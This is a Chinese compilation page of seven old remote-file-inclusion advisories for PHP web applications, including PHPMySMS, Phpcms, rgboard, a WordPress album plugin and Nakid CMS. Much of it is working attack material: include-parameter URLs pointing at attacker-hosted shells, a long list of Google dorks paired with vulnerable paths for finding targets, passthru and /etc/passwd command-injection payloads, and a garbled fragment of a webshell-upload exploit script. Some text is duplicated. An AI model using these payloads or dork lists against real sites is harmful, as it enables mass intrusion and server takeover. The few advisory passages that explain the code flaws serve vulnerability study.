下面是小编整理的PHPMySMS远程文件包含漏洞,本文共7篇,欢迎您能喜欢,也请多多分享。
篇1:PHPMySMS远程文件包含漏洞
受影响系统:
PhpMySms PhpMySms <= V2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18633
PHPMySMS是一款开放源码的用PHP实现的基于Web的短信解决方案,
PHPMySMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
远程攻击者可以利用PHPMySMS的gateway.php文件中的远程文件包含漏洞执行任意PHP代码。漏洞代码如下:
==============================================================
if (($_POST[mode] == “1”) or ($_GET[mode] == “1”)) {
include (“config.php”);
} else {
include (“$ROOT_PATH/config.php”);
}
==============================================================
<*来源:Persian-Defacer (www.Hacking-Boys.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,
使用者风险自负!
[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]
建议:
--------------------------------------------------------------------------------
厂商补丁:
PhpMySms
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Http://www.phpmysms.com
篇2:Phpcms 远程文件包含漏洞
,
伪代码:
$rootdir = str_replace(“\\”, '/', dirname(__FILE__));
//下面就是require $rootdir.'/include/common.inc.php';引入的代码
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php
?>
不知道看到这里,看官们有什么感想?如果这里用grep等软件去找静态的上跟踪这个的话障很再可能就会漏调着可能分析得到的结果是:
$rootdir = str_replace(“\\”, '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php'
require $rootdir.'/web/admin/include/common.inc.php
一看$rootdir被过滤了,就会认为这里安全了?
所以一味的grep等静态去找,是找不到这样的bug的上...
来个“马后炮”,对于这样的上用灰盒测试可能效果很好:就是先看代码看common.inc.php这个躯干里发现用变量覆盖,然后黑盒去找跑那些变量可以覆盖.....
篇3:Phpcms 远程文件包含漏洞漏洞预警
[zz]Phpcms 2007 远程文件包含漏洞
url:www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost
这个漏洞是一个比较普通的变量覆盖漏洞,这里转一下是由于发现这个漏洞如果是白盒那要都仔细看代码才行 :)
引用 :
------------------------------------------------
//从头开始看
$rootdir = str_replace(“\\”, '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
------------------------------------------------
注意看里面的2个require,第一个那引进的extract的代码,第2个require才导致漏洞的函数,
Phpcms 2007 远程文件包含漏洞漏洞预警
,
伪代码:
$rootdir = str_replace(“\\”, '/', dirname(__FILE__));
//下面就是require $rootdir.'/include/common.inc.php';引入的代码
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php
?>
不知道看到这里,看官们有什么感想?如果这里用grep等软件去找静态的上跟踪这个的话障很再可能就会漏调着可能分析得到的结果是:
$rootdir = str_replace(“\\”, '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php'
require $rootdir.'/web/admin/include/common.inc.php
一看$rootdir被过滤了,就会认为这里安全了?
所以一味的grep等静态去找,是找不到这样的bug的上...
来个“马后炮”,对于这样的上用灰盒测试可能效果很好:就是先看代码看common.inc.php这个躯干里发现用变量覆盖,然后黑盒去找跑那些变量可以覆盖.....
篇4:rgboard 3.0.12 远程文件包含漏洞
Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]
rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *-- BBS_LIB_INC_INCLUDED START --*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=yousite/
篇5:WordPress 插件DM相册1.9.2 远程文件包含漏洞
本文章可以合作者在此交流:bbs.7747.net/read.php?tid=89415
作者:Crackkey请注明来自红色 联盟(www.7747.net)
#############################################################################################
[+] DM Albums™ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script. wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] [sitename]/[path]/template/album.php?SECURITY_FILE=attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] [sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördüğüm En hıyar Lamersin :D
Bu Kafiyelerde Bi Tarafına Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >
# CrackkeyNet .06.29
www.fvcking.cn
篇6:一些远程文件包含漏洞 Remote File Inclusion list [ with d0rkz ]
来源:x140yu
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurl:PNphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. allinurl:ihm.php?p=
7. Keyword : “powered by AllMyLinks”
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : “Powered by phpBB 2.0.6”
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : “powered by CubeCart 3.0.6”
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
13. keyword : “powered by paBugs 2.0 Beta 3”
/class.mysql.php?path_to_bt_dir=
14. allinurl:“powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. allinurl:ihm.php?p=*
14. keyword : “powered eyeOs”
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
17. allinurl:modules.php?name=Forums
/modules.php?name=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
22. allinurl:application.php?base_path=
/application.php?base_path=
23. allinurl:phplivehelper
/phplivehelper/initiate.php?abs_path=
24. allinurl:phpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
25. key word : “powered by Fantastic News v2.1.2”
/archive.php?CONFIG[script_path]=
26. keyword: “powered by smartblog” AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc_conf=
28. keyword:“Powered By FusionPHP”
/templates/headline_temp.php?nst_inc=
29. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=
30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : “Powered by iUser”
/common.php?include_path=
32. allinurl: “static.php?load=”
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
36. phpGedView 2.65.1
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_conf
ig=../../../../../../etc/passwd
or
[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
61:if (empty($gedcom_config)) {
62: if (!empty($_POST[“gedcom_config”])) $gedcom_config = $_POST[“gedcom_config”];
63: else $gedcom_config = “config_gedcom.php”;
64:}
65:
66:require($gedcom_config);
The both GET/POST requets will work evenif PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS
E_DIRECTORY=attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR.“theme.php”)) require($PGV_BASE_DIRECTORY.$THEME_DIR.“theme.php”);
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY.“themes/standard/”;
126: require($THEME_DIR.“theme.php”);
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a [target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php =
and the request, will execute the phpinfo command on the vulnerable target.
37. inurl:signup.php?usertype=pf
www.contoh.com/common.inc.php?CFG[libdir]=www.geocities.com/k4k3_rgb/test?cmd
non offiziell
[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS
E_DIRECTORY=attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR.“theme.php”)) require($PGV_BASE_DIRECTORY.$THEME_DIR.“theme.php”);
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY.“themes/standard/”;
126: require($THEME_DIR.“theme.php”);
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a [target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php =
and the request, will execute the phpinfo() command on the vulnerable target.
37. inurl:signup.php?usertype=pf
www.contoh.com/common.inc.php?CFG[libdir]=www.geocities.com/k4k3_rgb/test?cmd
=============================================================================
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/cgi-bin/diary/sdy.cgi?md=past&tg=200405.dat|uname%20-a|
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_GET_VARS[sh]).%2527&sh=ls%20-al
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_GET_VARS[sh]).%2527&sh=ls%20-al
/forumlinux/viewtopic.php?t=29%20&highlight=%2527&highlight=%2527.passthru($HTTP_GET_VARS[CMD]).%2527&CMD=ls%20-al;
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/cgi-bin/site/session.cgi?page=links.html|cat /etc/passwd|
/forums/viewtopic.php?t=4&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=dir%20....
/phpBB2/viewtopic.php?t=7&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
/forum/viewtopic.php?t=232&highlight=%2527.phpinfo().%2527
/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/allinurl:/index.php?page= site:*.dk
/allinurl:“pnphpbb2
/inurl:/allmyguest
/allinurl:/index.php?file= site:*.dk
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
篇7:Nakid CMS 0.5.2 fckeditor上传和远程文件包含漏洞漏洞预警
Nakid CMS存在两处漏洞,其中是fckeditor编辑器文件上传漏洞,其次是图片上传页upload_photo.php远程文件包含漏洞,
一:fckeditor编辑器文件上传漏洞
漏洞文件: path/includes/js/fckeditor/editor/filemanager/connectors/php/config.php
代码:
[*] // SECURITY: You must explicitly enable this ”connector“. (Set it to ”true“).
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/nakid_uploads/' ;
[*] //$Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*] // What the user can do with this connector.
[*] $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;
fckeditor缺省配置,未对上传参数进行严格过滤可上传可执行脚本。
Exploite: < 3) { print ”\nUsage......: php $argv[0] host path\n“; print ”\nExample....: php $argv[0] localhost /“; print ”\nExample....: php $argv[0] localhost /Nakid/\n“; die(); } $host = $argv[1]; $path = $argv[2]; if (!($ext = upload())) die(”\n\n[-] Exploit failed You are not lucky...\n“); else print ”\n[-] Shell uploaded in progress...!\n“; define(STDIN, fopen(”php://stdin“, ”r“)); while(1) { print ”\Nakid-shell# “; $cmd = trim(fgets(STDIN)); if ($cmd != ”exit“) { $packet = ”GET {$path}0k.php.{$ext} HTTP/1.0\r\n“; $packet.= ”Host: {$host}\r\n“; $packet.= ”Cmd: “.base64_encode($cmd).”\r\n“; $packet.= ”Connection: close\r\n\r\n“; $html = http_send($host, $packet); if (!eregi(”_code_“, $html)) die(”\n[-] Exploit failed You are not lucky...\n“); $shell = explode(”_code_“, $html); print ”\n{$shell[1]}"; } else break; } ?>
远程文件包含漏洞:
Exp:127.0.0.1/modules/catalog/upload_photo.php?core[system_path]=www.hackqing.cn/shell.txt?
官方地址:sourceforge.net/projects/nakidcms/files/Nakid%20CMS%20v_0_5_2.rar/download
★xheditor编辑器upload.php畸形文件上传漏洞漏洞预警
文档为doc格式
